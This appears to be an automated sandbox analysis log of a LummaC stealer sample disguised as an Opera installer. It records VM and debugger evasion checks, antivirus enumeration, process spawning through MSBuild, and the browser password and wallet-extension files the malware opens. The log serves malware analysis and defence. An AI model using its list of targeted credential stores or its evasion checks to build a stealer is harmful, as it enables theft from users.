Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmp	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmp	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmp	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem

Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Code function: 12_2_00EB0582 FindFirstFileExW,		12_2_00EB0582
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Code function: 12_2_00E88D04 FindFirstFileW,		12_2_00E88D04

Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe

Code function: 12_2_00E8A3FD GetSystemInfo,

12_2_00E8A3FD

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior

Source: is-SBTFQ.tmp.10.dr	Binary or memory string: 0JvPartitionType_VMWareUnknownW@
Source: is-SBTFQ.tmp.10.dr	Binary or memory string: AdditionsFacilityType_VBoxGuestDriverWWW
Source: is-SBTFQ.tmp.10.dr	Binary or memory string: !0R4AdditionsFacilityType_VBoxServiceWWW
Source: is-SBTFQ.tmp.10.dr	Binary or memory string: PartitionType_VMWareVMFS@
Source: MSBuild.exe, 0000000D.00000002.2952072079.0000000000FE6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0
Source: is-SBTFQ.tmp.10.dr	Binary or memory string: AdditionsFacilityType_VBoxTrayClient
Source: is-SBTFQ.tmp.10.dr	Binary or memory string: PartitionType_VMWareReserved@
Source: is-SBTFQ.tmp.10.dr	Binary or memory string: aVmNetTx
Source: OperaAirSetup.exe, 0000000C.00000002.2856805548.0000000003371000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware\|VIRTUAL\|A M I\|Xen
Source: cmd.exe.0.dr	Binary or memory string: QEMuB-
Source: is-SBTFQ.tmp.10.dr	Binary or memory string: aVmNetRx
Source: MSBuild.exe, 0000000D.00000002.2952072079.0000000000FE6000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2951710286.0000000000FAC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: OperaAirSetup.exe, 0000000C.00000002.2856805548.0000000003371000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Microsoft\|VMWare\|Virtual
Source: cmd.tmp, 00000008.00000002.2363683894.0000000000668000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}C,M\|
Source: is-SBTFQ.tmp.10.dr	Binary or memory string: PartitionType_VMWareVMKCoreW@
Source: powershell.exe, 00000000.00000002.2384360548.000000000795D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 13_2_00446040 LdrInitializeThunk,

13_2_00446040

Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe

Code function: 12_2_00EA6B4B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

12_2_00EA6B4B

Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Code function: 12_2_029B03C1 mov edx, dword ptr fs:[00000030h]	12_2_029B03C1
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Code function: 12_2_029B0981 mov eax, dword ptr fs:[00000030h]	12_2_029B0981
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Code function: 12_2_029B0FD1 mov eax, dword ptr fs:[00000030h]	12_2_029B0FD1
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Code function: 12_2_029B0FD0 mov eax, dword ptr fs:[00000030h]	12_2_029B0FD0
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Code function: 12_2_029B0D31 mov eax, dword ptr fs:[00000030h]	12_2_029B0D31

Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe

Code function: 12_2_00EB1690 GetProcessHeap,

12_2_00EB1690

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Code function: 12_2_00EA6B4B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	12_2_00EA6B4B
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Code function: 12_2_00EA0F3B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	12_2_00EA0F3B
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Code function: 12_2_00EA1993 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	12_2_00EA1993
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Code function: 12_2_00EA1B20 SetUnhandledExceptionFilter,	12_2_00EA1B20

Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Temp\cmd.exe "C:\Windows\Temp\cmd.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmp	Process created: C:\Windows\Temp\cmd.exe "C:\Windows\Temp\cmd.exe" /VERYSILENT	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior

Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Code function: GetLocaleInfoW,	12_2_00EB4082
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	12_2_00EB415E
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Code function: GetLocaleInfoEx,FormatMessageA,	12_2_00EA2707
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Code function: EnumSystemLocalesW,	12_2_00EAD08E
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Code function: GetLocaleInfoW,	12_2_00EAD557
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Code function: GetACP,IsValidCodePage,GetLocaleInfoW,	12_2_00EB37E0
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Code function: EnumSystemLocalesW,	12_2_00EB3ADD
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Code function: EnumSystemLocalesW,	12_2_00EB3A92
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Code function: EnumSystemLocalesW,	12_2_00EB3B78
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	12_2_00EB3C03
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Code function: GetLocaleInfoW,	12_2_00EB3E57
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	12_2_00EB3F7C

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Queries volume information: C:\Users\user\Desktop\wEY98gM1Jj.ps1 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe

Code function: 12_2_00EA1B8A GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

12_2_00EA1B8A

Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe

Code function: 12_2_00E81C5E GetVersion,GetModuleHandleW,GetProcAddress,GetSystemDirectoryW,LoadLibraryExW,

12_2_00E81C5E

Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: cmd.exe, 00000007.00000003.2366781535.00000000021DA000.00000004.00001000.00020000.00000000.sdmp, cmd.tmp, 00000008.00000003.2359613822.0000000002215000.00000004.00001000.00020000.00000000.sdmp, cmd.tmp, 00000008.00000003.2359613822.00000000021A0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.2574767782.0000000002251000.00000004.00001000.00020000.00000000.sdmp, cmd.tmp, 0000000A.00000003.2571404354.00000000032E6000.00000004.00001000.00020000.00000000.sdmp, cmd.tmp, 0000000A.00000003.2571640217.00000000022B8000.00000004.00001000.00020000.00000000.sdmp, cmd.tmp, 0000000A.00000003.2571640217.0000000002299000.00000004.00001000.00020000.00000000.sdmp, cmd.tmp, 0000000A.00000003.2571640217.0000000002333000.00000004.00001000.00020000.00000000.sdmp, cmd.tmp, 0000000A.00000003.2571404354.00000000032F6000.00000004.00001000.00020000.00000000.sdmp, cmd.tmp, 0000000A.00000003.2571640217.000000000232B000.00000004.00001000.00020000.00000000.sdmp, cmd.exe.0.dr	Binary or memory string: avgui.exe
Source: MSBuild.exe, 0000000D.00000002.2953388401.0000000003670000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: 13.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.2868710892.00000000043C5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2951364094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.json	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.db	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
